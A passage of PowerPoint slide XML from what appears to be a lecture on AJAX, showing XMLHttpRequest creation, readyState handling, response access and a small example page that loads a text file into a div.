            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Microsoft.XMLHTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18948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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onreadystatechange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> property of an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> object one can set the action to be performed when the result of a query is received</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request.onreadystatechange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = function(){</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;code here</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then, one can execute the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('GET', 'http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>show.php?keyword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=foo', true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that the third parameter indicates that the request is asynchronous, that is, the execution of JavaScript will proceed while the requested document is being downloaded</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3384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Lifecycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function specified using the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onreadystatechange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" property will be called at any change in the request status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0 (uninitialized: Object is not initialized with data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 (loading: Object is loading its data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2 (loaded: Object has finished loading its data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3 (interactive: User can interact with the object even though it is not fully loaded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4 (complete: Object is completely initialized)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually wait until the status is “complete”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request.readyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> == 4) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  operates on data} else {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  not ready, return}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2536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Reserved Characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1650078"/>
            <a:ext cx="4106078" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4563278" y="1650078"/>
            <a:ext cx="4106078"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latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;</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a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38162112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Success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After having received the document (and having checked for a successful return code – 200) the content of the request can be accessed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a string by calling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request.responseText</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLDocument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> object: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request.responseXML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this case the object can be modified using the JavaScript DOM interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19467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Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  &lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    &lt;meta charset="UTF-8"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    &lt;title&gt;AJAX Example&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    &lt;h1&gt;AJAX Example&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    &lt;div id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>insert_here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    &lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>   &lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169231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Example</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    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>typeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> != "undefined")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http_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>XMLHttpRequest</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else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http_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Microsoft.XMLHTTP</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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>typeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> console == "undefined") {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      console = { "log" : function (text) { alert(text); } };</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http_request.onreadystatechange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = function () {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request.readyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request.readyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> === 4) {</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text = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>new_node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.createTextNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(text);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>insert_here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>new_node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("Before Request");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('GET', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ajax_test.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>', true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request.send</a:t>
            </a:r>
